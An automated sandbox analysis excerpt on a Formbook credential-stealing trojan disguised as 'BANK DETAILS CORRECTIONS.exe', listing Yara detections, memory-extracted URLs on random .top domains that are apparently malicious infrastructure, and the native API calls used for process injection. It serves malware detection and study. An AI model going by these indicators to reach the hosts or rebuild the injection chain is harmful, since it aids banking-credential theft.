                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://6c4.l0yg7.top/nv6hczm/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://7yx2zl.ss1yp.top/tj0852/x0qd1j.xls
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://85bj22.jsj91.top/2xat4/m98nsm.xls
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://8j3my.stgu5.top/322/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://8uu.65spz.top/dhqv/
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
                Source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://auvq.gta6p.top/qjeml6z/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://bah.laoli666.top/ok8x/ttbj2.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://bzem8k.8kb9n.top/umcbim/nf2.xlsx
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cj4x.fehs5.top/n93ovfl/
                Source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://crs7b73.7q14w.top/hgwuscj/1z8.doc
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d17ced.6imvv.top/nutmwu9/mie.docx
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://eocmn.1osh5.top/lnyp0/
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000004E54000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.0000000003314000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.1678819891.000000002FE94000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://error.kangleweb.net/?code=404&vh=vhsa57698

                E-Banking Fraud

                Source: Yara match, File source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: C:\Windows\SysWOW64\sdiagnhost.exe, Process Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_0040B043 NtCreateSection,12_2_0040B043
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_0040A803 NtGetContextThread,12_2_0040A803
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_0040B263 NtMapViewOfSection,12_2_0040B263
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_0040AA13 NtSetContextThread,12_2_0040AA13
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_0040BB33 NtDelayExecution,12_2_0040BB33
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_0042BBF3 NtClose,12_2_0042BBF3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_0040AC23 NtResumeThread,12_2_0040AC23
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_0040B493 NtCreateFile,12_2_0040B493
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_0040A5F3 NtSuspendThread,12_2_0040A5F3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_0040B6C3 NtReadFile,12_2_0040B6C3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_0040BF53 NtAllocateVirtualMemory,12_2_0040BF53
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962B60 NtClose,LdrInitializeThunk,12_2_01962B60
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_01962DF0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_01962C70
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_019635C0 NtCreateMutant,LdrInitializeThunk,12_2_019635C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01964340 NtSetContextThread,12_2_01964340
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01964650 NtSuspendThread,12_2_01964650
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962B80 NtQueryInformationFile,12_2_01962B80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962BA0 NtEnumerateValueKey,12_2_01962BA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962BF0 NtAllocateVirtualMemory,12_2_01962BF0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962BE0 NtQueryValueKey,12_2_01962BE0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962AB0 NtWaitForSingleObject,12_2_01962AB0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962AD0 NtReadFile,12_2_01962AD0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962AF0 NtWriteFile,12_2_01962AF0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962DB0 NtEnumerateKey,12_2_01962DB0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962DD0 NtDelayExecution,12_2_01962DD0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962D10 NtMapViewOfSection,12_2_01962D10
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962D00 NtSetInformationFile,12_2_01962D00
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962D30 NtUnmapViewOfSection,12_2_01962D30
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962CA0 NtQueryInformationToken,12_2_01962CA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962CC0 NtQueryVirtualMemory,12_2_01962CC0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962CF0 NtOpenProcess,12_2_01962CF0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962C00 NtQueryInformationProcess,12_2_01962C00
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962C60 NtCreateKey,12_2_01962C60
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962F90 NtProtectVirtualMemory,12_2_01962F90
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962FB0 NtResumeThread,12_2_01962FB0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962FA0 NtQuerySection,12_2_01962FA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962FE0 NtCreateFile,12_2_01962FE0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962F30 NtCreateSection,12_2_01962F30
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962F60 NtCreateProcessEx,12_2_01962F60
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962E80 NtReadVirtualMemory,12_2_01962E80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962EA0 NtAdjustPrivilegesToken,12_2_01962EA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962EE0 NtQueueApcThread,12_2_01962EE0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01962E30 NtWriteVirtualMemory,12_2_01962E30
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01963090 NtSetValueKey,12_2_01963090
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01963010 NtOpenDirectoryObject,12_2_01963010
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_019639B0 NtGetContextThread,12_2_019639B0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01963D10 NtOpenProcessToken,12_2_01963D10
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, Code function: 12_2_01963D70 NtOpenThread,12_2_01963D70
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019168B812_2_019168B8
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E8F012_2_0195E8F0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193A84012_2_0193A840
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E6BD712_2_019E6BD7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EAB4012_2_019EAB40
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192EA8012_2_0192EA80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01948DBF12_2_01948DBF
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192ADE012_2_0192ADE0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CCD1F12_2_019CCD1F
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193AD0012_2_0193AD00
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0CB512_2_019D0CB5
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01920CF212_2_01920CF2
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930C0012_2_01930C00
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019AEFA012_2_019AEFA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01922FC812_2_01922FC8
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193CFE012_2_0193CFE0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01950F3012_2_01950F30
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D2F3012_2_019D2F30
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01972F2812_2_01972F28
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A4F4012_2_019A4F40
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01942E9012_2_01942E90
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019ECE9312_2_019ECE93
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EEEDB12_2_019EEEDB
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EEE2612_2_019EEE26
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930E5912_2_01930E59
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193B1B012_2_0193B1B0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191F17212_2_0191F172
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019FB16B12_2_019FB16B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0196516C12_2_0196516C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019DF0CC12_2_019DF0CC
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019370C012_2_019370C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E70E912_2_019E70E9
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EF0E012_2_019EF0E0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0197739A12_2_0197739A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E132D12_2_019E132D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191D34C12_2_0191D34C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019352A012_2_019352A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194B2C012_2_0194B2C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D12ED12_2_019D12ED
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CD5B012_2_019CD5B0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E757112_2_019E7571
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EF43F12_2_019EF43F
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192146012_2_01921460
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EF7B012_2_019EF7B0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019217EC12_2_019217EC
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E16CC12_2_019E16CC
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C591012_2_019C5910
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193995012_2_01939950
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194B95012_2_0194B950
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019338E012_2_019338E0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199D80012_2_0199D800
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194FB8012_2_0194FB80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A5BF012_2_019A5BF0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0196DBF912_2_0196DBF9
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EFB7612_2_019EFB76
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CDAAC12_2_019CDAAC
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01975AA012_2_01975AA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D1AA312_2_019D1AA3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019DDAC612_2_019DDAC6
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EFA4912_2_019EFA49
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E7A4612_2_019E7A46
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A3A6C12_2_019A3A6C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194FDC012_2_0194FDC0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E1D5A12_2_019E1D5A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01933D4012_2_01933D40
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E7D7312_2_019E7D73
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EFCF212_2_019EFCF2
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A9C3212_2_019A9C32
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01931F9212_2_01931F92
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EFFB112_2_019EFFB1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EFF0912_2_019EFF09
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01939EB012_2_01939EB0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04BCDCB413_2_04BCDCB4
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04CD856813_2_04CD8568
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04CD815413_2_04CD8154
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04CD855913_2_04CD8559
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04CD004013_2_04CD0040
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04CD000613_2_04CD0006
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04CDB2C013_2_04CDB2C0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04D2C6E013_2_04D2C6E0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04D2C6D013_2_04D2C6D0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052FDC4813_2_052FDC48
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052F113813_2_052F1138
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052F114813_2_052F1148
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052FCC6813_2_052FCC68
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052F13D813_2_052F13D8
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052F2E8713_2_052F2E87
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052F2E9813_2_052F2E98
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F876C813_2_06F876C8
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F850E013_2_06F850E0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F8CF2813_2_06F8CF28
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F84CA813_2_06F84CA8
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F86D1813_2_06F86D18
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F86D0B13_2_06F86D0B
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F8DBE013_2_06F8DBE0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F868E013_2_06F868E0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052F13E813_2_052F13E8
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0151010020_2_01510100
